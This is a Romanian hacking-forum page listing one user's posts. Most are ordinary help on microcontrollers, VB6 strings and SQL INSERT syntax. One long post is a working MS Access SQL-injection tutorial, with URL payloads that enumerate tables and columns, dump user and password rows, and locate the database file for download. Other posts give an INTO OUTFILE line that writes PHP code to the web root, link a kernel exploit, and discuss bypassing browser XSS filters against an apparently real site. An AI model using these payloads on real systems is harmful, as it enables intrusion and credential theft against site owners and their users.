Jump to content

dancezar

Active Members
  • Posts

    981
  • Joined

  • Last visited

  • Days Won

    20

Everything posted by dancezar

  1. Pai daca ar fi sa gandim de cea ce ai nevoie pentru proiect ai avea nevoie de 2 intrari RX si TX pentru bluethood si o iesire digitala pentru releu de la yala , probabil un microcontroler atiny45 e mai mult decat suficient pentru ce iti trebuie sau daca nu poti opta pentru o placuta MSP era un chilipir costa foarte putin parca 45 de lei si stia sa faca destul de multe era si un IDE care te ajuta sa il programezi ca pe arduino. Am mai vazut o placuta Wixel parca ii zicea de avea si wirelles 2.4 incorporat
  2. HINT:hxxp://www.getmeontop.com/search.php?query=organic+search+engine+ranking&search=1 Si tineti cont de ce am spus mai sus
  3. Este vorba despre altceva , site-ul ala are filtru pe un caracter , cu ajutorul acelui filtru poti face "bypass" la auditorul de pe chrome si IE. Plm <script>alert(1);</script> e mult prea simplu.
  4. Citeste complet regurile "Trebuie sa faceti un vector sa functioneze in acelasi timp pe IE 8 si Chrome"
  5. Read the rulles please,if works on IE and Chrome too send me the syntax
  6. Sql injection pe MSACCES 1) Introducere Ce este Ms access? Este un sistem de stocare a datelor sub forma unei baze de date oferit de microsoft in pachetul Microsoft office Ms access stocheaza datele sub forma de fisire .mdb astfel nu v-a fi nevoie sa folositi un server dedicat pentru baza de date (ex: mysql ,mssql, postgres). Poate fi folosit si de libajele de programare web (PHP ,ASP) dar totusi cele mai intalnite cazuri sunt pe serverele IIS (asp). 2) Asemanari / Deosibiri intre Ms access si Mysql spre exemplu Asemanari: -Ambele folosesc ca limbaj SQL -Datele sunt structurate pe tabele si coloane Deosebiri: -Ms access foloseste un fisier diferit pentru fiecare baza de date -Pentru a face union based in MS ACCESS trebuie sa cunoasteti numele unui tabel existent -Nu se folosesc commentarii pentru anularea sinstaxei singurul care functioneaza este %00 (NULL Byte) 2) Cum gasit vulnerabilitatea Ca si la mysql testam cu ajutorul ' vom obtine o eroare si in general erorile apar sub forma: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' Dar totusi asta nu inseamna ca in spate se afla un un MS Access doarece se poate folosi acest OBDC si pe MSSQL. Cum testam daca acolo este MSACCES? Simplu pe MSACCES ca sa faceti union aveti nevoie de un tabel pe cand pe MSSQL nu este nevoie. Exemplu : site.com/news.asp?id=1 union select 1 -> Daca obtinem urmatoarea eroare inseamna ca sigur este MSACCESS : Query input must contain at least one table or query. Daca obtineti urmatoarea eroare inseamna ca este MSSQL : All queries in an SQL statement containing a UNION operator must have an equal number of expressions in 3) Sa trecem in paine Dupa cum spuneam mai sus avem nevoie de un tabel existent pentru a putea face union Exemplu : union select null,null from tabel Observatie: Ca sa fiti sigur folositi null in loc de numere (union select 1,2,3) , sunt cazuri in care MSACCESS face diferenta intre tipuri de date (string/INTEGER) Observatie 2: Nu trebuie sa punem - in fata parametrului sau and 0, pentru anularea primului select !( id=-1 union select 1,2,3,4) 1.1) Sa ghicim un tabel existent Pentru a ghici un tabel folosim o simpla sitaxa si in functie de rezultat ne vom da seama daca acolo exista acel tabel sau nu. : and (select count(*) from [tabel] limit 1)>0 Daca veti obtine o eroare de genul :The Microsoft Jet database engine cannot find the input table or query 'plm' veti stii sigur ca acest tabel nu exista daca nu inseamna ca tabelul exista! Exista cateva tabele care care exista ca default pe MSACCES: MSysACEs MSysObjects MSysQueries MSysRelationships Dar in majoritatea cazurilor acestea sunt blocate si ati putea o eroare de genul:Record(s) cannot be read; no read permission on ' Dar in cazul in care acesta se poate citi putem afla numele tabelelor deoarece acestea contin numele tabelelor Exemplu : union select null,null,Name from MSysACEs where type=1 --> sa zicem ca obtinem news il retinem union select null,null,Name from MSysACEs where type=1 and Name not in('news') --> obtinem products union select null,null,Name from MSysACEs where type=1 and Name not in('news','products') --> obtinem admin ............................................................................................................. 1.2) Pasul 2 sa ghicim numarul de coloane: Sunt 2 posibilitati de a numara coloanele: Order by X Sau union select null , union select null,nul , union select null,null,null pana obtinem un rezultat pozitiv Cazul fericit este cel in care se poate numara coloanele ca sa vedem daca putem numara coloanele cu order by facem in felul urmator: : site.com/news.asp?id=1 order by 1%00 ---> rezultat pozitiv site.com/news.asp?id=1 order by 1000000%00 --> daca obtinem eroarea Microsoft Jet database engine does not recognize '1000000' puteti numara coloanele cu ORDER BY asa cum erati obisnuiti pe MYSQL Cazul nefericit este atunci cand obtinem o pagina fara eroare la order by 1000000 atunci trebuie sa facem cu union pe rand Exemplu: site.com/news.asp?id=1 union selct null from tabelul_ghicit_la_pasul_1.1%00 site.com/news.asp?id=1 union selct null,null from tabelul_ghicit_la_pasul_1.1%00 site.com/news.asp?id=1 union selct null,null,null from tabelul_ghicit_la_pasul_1.1%00 ...................................................................................... Pana nu mai obtineti eroarea The number of columns in the two selected tables or queries of a union query do not match. 1.3) Cautam o coloana vulnerabila . Am spus anterior ca vom folosi null in loc de numere la coloanele din union doarece exista situatia in care se face diferenta intre tipurile de date de pe coloanele din primul select cu cel injectie.Daca punem null sa fiti sigur ca nu v-a aparea nimic in pagina sursa. Cum cautam coloana vulnerabila? Spre exemplu avem : site.com/news.asp?id=1 union select null,null,null%00 Vom pune un cuvant sa zicem 'test' pe fiecare coloana iar atunci cand acel cuvant apare in pagina sursa inseamna ca am gasit o coloana vulnerabila Exemplu: site.com/news.asp?id=1 union select 'test',null,null from users%00 --> nimic in pagina sursa site.com/news.asp?id=1 union select null,'test',null%00 from users --> Bingo in pagina sursa apare test inseamna ca acea este coloana vulnerabila Pentru cazurile in care '' nu sunt permise sau eliminate folosim functia CHR(cod_ascii) site.com/news.asp?id=1 union select null,chr(74)%2bchr(65)%2bchr(73)%2bchr(74),null from users%00 --> Bingo in pagina sursa apare test inseamna ca acea este coloana vulnerabila (Echivalentul pentru 'test') 1.4) Gasirea unei coloane Aici chiar nu avem ce face si vom fi nevoiti sa ghicim numele coloanelor: username ,password ,user_name,user_password,etc.. Ca sa ghicim o coloana folosim: site.com/news.asp?id=1 union select null,coloana,null from users%00 Daca obtinem rezultate concrete in pagina inseamna ca am ghicit coloana daca obtinem eroarea:Too few parameters. Expected 1 ,neeee Un trick pentru a afla prima coloana din tabelul curent este acesta site.com/news.asp?id=1 having sum(1)=1 --> veti obtine You tried to execute a query that does not include the specified expression 'coloana' 1.5) Extragerea datelor Dupa ce am aflat tabelul cu date si coloanele acum mai trebuie sa extragem ceva date. Prima si prima data trebuie sa stim cate randuri trebuie sa extragem.Ca si la mysql ne folosim de COUNT(*) si obtinem numarul de randuri din tabel site.com/news.asp?id=1 union select null,count(*),null from users%00 Sa zicem ca la 1.4 am gasit coloanele : user si password. Ca sa facem dump la aceste coloane folosim sintaxa: site.com/news.asp?id=1 union select null,user%2bpassword,null from users%00 --> sa zicem ca obtinem admin:admin123 trebuie sa retinem user-ul acesta ca sa putem trece la urmatorul (de retinut %2b este +) site.com/news.asp?id=1 union select null,user%2bpassword,null from users where user not in('admin')%00 --> sa zicem ca obtinem guest site.com/news.asp?id=1 union select null,user%2bpassword,null from users where user not in('admin','guest')%00 --> sa zicem ca obtinem user site.com/news.asp?id=1 union select null,user%2bpassword,null from users where user not in('admin','guest','user')%00 --> si asa mai departe cred ca ati prins algoritmul 2) Aflarea locatiei bazei de date ( fisierul .mdb) Folosim urmatoarea sintaxa; site.com/news.asp?id=1 and (select * from nimic.nimic) Si obtineti o eroarea care zice : Could not find file 'c:\server\htdocs\secret_location\nimic.mdb'. Atunci veti stii ca fisierul cu baza de date se afla in acel folder si daca avet norocul sa puteti vedea Index of( exemplu : site.com/secret_location) veti putea descaraca baza de date si obtineti datele complete Daca nu veti fi nevoiti sa ghicici numele bazei de date ( database.mdb users.mdb data_base.mdb ceva in genul) Un cheat shet mai extins: http://www.krazl.com/blog/index.php/ms-access-sql-injection-cheat-sheet/ Si niste chestii mai interesante: http://seclists.org/pen-test/2003/May/74 Sper sa va fie de ajutor lectura , daca da futeti un like Daca sunt greseli tehnice sau de gramatica va rog sa le semnalati
  7. Tare ideia ce site foloseste ca sa scaneze?
  8. Pai daaa.... Sent from my Nokia 1310 using Tapatalk
  9. Pai daca vrei ca sa iti adauge la sfarsitul text boxului bagi asa Text1.text=Text1.text & Mid(Text1.text, 4, Len(Text1.text)) Am vazut ca stringul tau este DEC: in cazul asta ca sa il ia si pe : bagi asa Text1.text=Text1.text & Mid(Text1.text, 5, Len(Text1.text)) O alta solutie : s=split(text,"DEC:") text1.text=text1.text & s[1]
  10. Text1.text=Mid(Text1.text, 4, Len(Text1.text)) Mid String,start,length String ->stringul care il modifica start -> caracterul de la care sa porneasca (numerotarea se face de la 1) length -> cate caractere sa cuprinda
  11. Frumos mai sunt inca persoane care lucreaza in Visual Basic 6 ,majoritatea au migrat pe .NET
  12. Da am vazut am crezut ca e de la mine:))))))) plm acuma apare ca a postat yoyois
  13. Nu e hard:| Am trimis 2 solutii una pe care ai fi vrut sa o foloseasca ceilalti si una care face bypass cu filtrul tau.
  14. Nebunule da ai curaj sa tii portu 80 deschis cu xammp si dvwa installat ) //inchide-l ca nu e bine
  15. Sunt persoane care practica aceasta activitate numai ca aia cumpara placi de baza telefoane componente PC la cantitati angro, cu sacii la preturi de nimic.
  16. http://m.memegen.com/7g143q.jpg
  17. Ncat clean : Ncat - Netcat for the 21st Century Semtex.c : http://www.tux-planet.fr/public/hack/exploits/kernel/semtex.c Este cam lame ,dar poate ajuta pe cineva.
  18. ///
  19. http://s7.postimg.org/ruukks2rt/xss2.png "Replies: 0 Views: 78 Pathetic, you're all idiots, you can't even pass an easy xss challenge. People who've tried this challenge and failed: danyweb09,qwerty12,dark-angel,Reckon,AkkiliON,Cifre,1337,kempactick,askwri te,sebywarlord,Coco93,Byte-ul. " every time when you make a challenge you say this:)) Anyway was a nice challenge GJ.
  20. pm'd
  21. Merge si fara dual select 'cod_php' INTO OUTFILE '/var/www/a.php' sau DUMPFILE.
  22. Insertu ala modifa-l cum ti-am spus mai sus, specifica coloanele dar sa nu includa keia primara. Uite cum ar trebui sa arate INSERT INTO `phpjob_crossnetwork` (`cross_name`,`cross_specialids`,`cross_type`,`cross_output`,`cross_language`,`cross_display`,`cross_header`,`cross_main`,`cross_footer`,`cross_noresult`,`cross_date`,`cross_active`,`cross_visit`,`cross_extratype`,`cross_extraids`) VALUES ( 'Default Template RSS', '', 'latest_jobs', 'rss', 'english', 10, '<?xml version="1.0" encoding="iso-8859-1"?>\r\n<rss version="2.0">\r\n<channel>\r\n <title>Latest Jobs Posted</title>\r\n <link>%%HOME_LINK%%</link>\r\n <description>Latest Jobs Posted</description>\r\n <pubDate>%%today_date%%</pubDate>\r\n <generator>rss20 by %%HOME_LINK%%</generator>\r\n <webMaster>%%site_mail%%</webMaster>\r\n', '\r\n<item>\r\n <title>%%job_jobtitle%%</title>\r\n <link>%%job_link%%</link>\r\n <description>%%job_description%%</description>\r\n <pubDate>%%job_jobdate%%</pubDate>\r\n</item>\r\n', '\r\n</channel>\r\n</rss>', '\r\n<item>\r\n <title>No Job Found</title>\r\n <link>%%HOME_LINK%%</link>\r\n <description>Visit %%HOME_LINK%% to see all the jobs available</description>\r\n <pubDate>%%today_date%%</pubDate>\r\n</item>\r\n', NOW( ) , 'yes', 0, '', '' );
  23. Cred ca ar trebui sa ii precizezi pe ce coloane sa introduca datele alea dar sa nu includa keya primara gen: INSERT INTO phpjob_crossnetwork (`cross_name`,`cross_specialids`,`cross_type`....) VALUES('Default Template RSS','',.....) Compltezi tu acolo..
  24. Sterge acel (14) lasa numai timestamp
  25. Exact! Protocolul HTTP este modul in care comunica clientul (browserul) cu serverul Apache ,cum se trimit datele, prin ce sunt despartite randurile (CRLF) etc...
×
×
  • Create New...